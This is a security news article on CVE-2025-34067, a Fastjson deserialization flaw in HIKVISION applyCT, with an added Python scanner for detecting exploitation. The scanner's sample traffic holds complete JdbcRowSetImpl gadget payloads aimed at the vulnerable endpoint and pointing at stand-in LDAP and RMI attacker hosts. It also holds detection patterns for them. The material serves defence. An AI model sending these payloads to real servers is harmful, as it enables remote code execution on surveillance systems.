CVE-2025-34067, rated at the maximum CVSS score of 10.0, is an unauthenticated remote code execution vulnerability in the HIKVISION applyCT platform. It stems from the platform's use of a vulnerable version of the Fastjson library, and the article warns that it exposes millions of surveillance devices worldwide to potential compromise. Organizations running affected applyCT systems face data breaches, service disruptions, and potential compromise of their entire security infrastructure; because the platform provides centralized control over many security devices and surveillance systems, its extensive adoption makes the flaw particularly concerning.

The attack is delivered as malicious JSON sent to the /bic/ssoService/v1/applyCT endpoint. Fastjson deserializes the attacker-chosen class com.sun.rowset.JdbcRowSetImpl, and by setting its dataSourceName property to point at a malicious LDAP server the attacker causes the application server to perform a JNDI lookup against that untrusted server, which results in remote code execution on the underlying system. The advisory classifies the issue as CWE-502 Deserialization of Untrusted Data combined with CWE-917 Expression Language Injection: insufficient input validation allows unauthorized class loading and code execution, bypassing the platform's security controls.

Specific patches have not been detailed in current advisories. Users should contact HIKVISION support for immediate remediation guidance and consider temporarily restricting access to the vulnerable endpoint until patches are available. Monitoring for unusual traffic to the /bic/ssoService/v1/applyCT endpoint, in particular POST bodies carrying the Fastjson @type key, can help detect exploitation attempts, as can alerting on outbound LDAP or RMI connections from the applyCT server, since a successful gadget forces the server itself to connect to the attacker's host.
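The payload shape described above and a detection check for it, as an added example that is not part of the original article and not HIKVISION's or Fastjson's code: a small Python scanner that classifies request bodies sent to the applyCT endpoint. The Fastjson type key `@type` and the JdbcRowSetImpl property `dataSourceName` are the standard public form of this gadget chain; the sample request log, the second path, the ticket fields and the 203.0.113.x addresses are constructed for the example.

```python
"""Flag Fastjson autoType / JNDI gadget payloads in POST bodies sent to the
applyCT endpoint. Added example; not from the article or from HIKVISION."""
import json
import re

TARGET_ENDPOINT = "/bic/ssoService/v1/applyCT"

# JNDI-capable gadget class used by this attack chain; the property that
# carries the attacker-controlled URL is JdbcRowSetImpl's dataSourceName.
GADGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"
JNDI_URL = re.compile(r"^(ldap|ldaps|rmi|iiop|corbaname)://", re.IGNORECASE)

# Raw-text fallback for bodies that strict JSON rejects but Fastjson tolerates
# (single quotes, unquoted keys, \u0040 escapes standing in for '@').
RAW_MARKERS = re.compile(
    r"(@type|\\u0040type|JdbcRowSetImpl|(ldap|ldaps|rmi)://)", re.IGNORECASE
)


def find_typed_objects(node):
    """Yield every JSON object that carries an @type key, at any depth."""
    if isinstance(node, dict):
        if "@type" in node:
            yield node
        for value in node.values():
            yield from find_typed_objects(value)
    elif isinstance(node, list):
        for item in node:
            yield from find_typed_objects(item)


def classify_body(body: str) -> str:
    """Return 'jndi_gadget', 'autotype', 'suspicious_raw' or 'clean'."""
    try:
        parsed = json.loads(body)  # json.loads also decodes \u0040 -> '@'
    except ValueError:
        return "suspicious_raw" if RAW_MARKERS.search(body) else "clean"
    typed = list(find_typed_objects(parsed))
    if not typed:
        return "clean"
    for obj in typed:
        if obj.get("@type") == GADGET_CLASS:
            dsn = obj.get("dataSourceName", "")
            if isinstance(dsn, str) and JNDI_URL.match(dsn.strip()):
                return "jndi_gadget"
    # Any @type on an SSO endpoint is abnormal: legitimate clients never set it.
    return "autotype"


def scan_requests(requests, endpoint=TARGET_ENDPOINT):
    """Return [(index, verdict)] for every non-clean request to `endpoint`."""
    hits = []
    for i, req in enumerate(requests):
        if req["path"] != endpoint:
            continue
        verdict = classify_body(req["body"])
        if verdict != "clean":
            hits.append((i, verdict))
    return hits


# Constructed sample traffic (not captured from a real system); 203.0.113.0/24
# is a documentation range standing in for the attacker's LDAP/RMI host.
SAMPLE_REQUESTS = [
    {"path": TARGET_ENDPOINT,
     "body": '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
             '"dataSourceName":"ldap://203.0.113.5:1389/Exploit","autoCommit":true}'},
    {"path": TARGET_ENDPOINT,
     "body": '{"ticket":"ST-1234-abc","service":"https://portal.example.internal/"}'},
    {"path": TARGET_ENDPOINT,
     "body": '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
             '"dataSourceName":"rmi://203.0.113.5:1099/Obj","autoCommit":true}'},
    {"path": "/bic/ssoService/v1/other",
     "body": '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://203.0.113.5/x"}'},
    {"path": TARGET_ENDPOINT,
     "body": "{'@type':'com.sun.rowset.JdbcRowSetImpl','dataSourceName':'ldap://203.0.113.5/x'}"},
]

if __name__ == "__main__":
    for index, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"request {index}: {verdict}")
```

The three verdict tiers are deliberate: `jndi_gadget` is the exact chain the advisory describes and warrants an immediate alert, `autotype` catches any attempt to steer Fastjson's class loading (other gadget classes exist), and `suspicious_raw` covers obfuscated bodies that a strict JSON parser rejects but Fastjson would still accept. Pair this with network-side alerting on outbound LDAP or RMI from the applyCT host.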
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 04 Jul 2025 10:10:13 +0000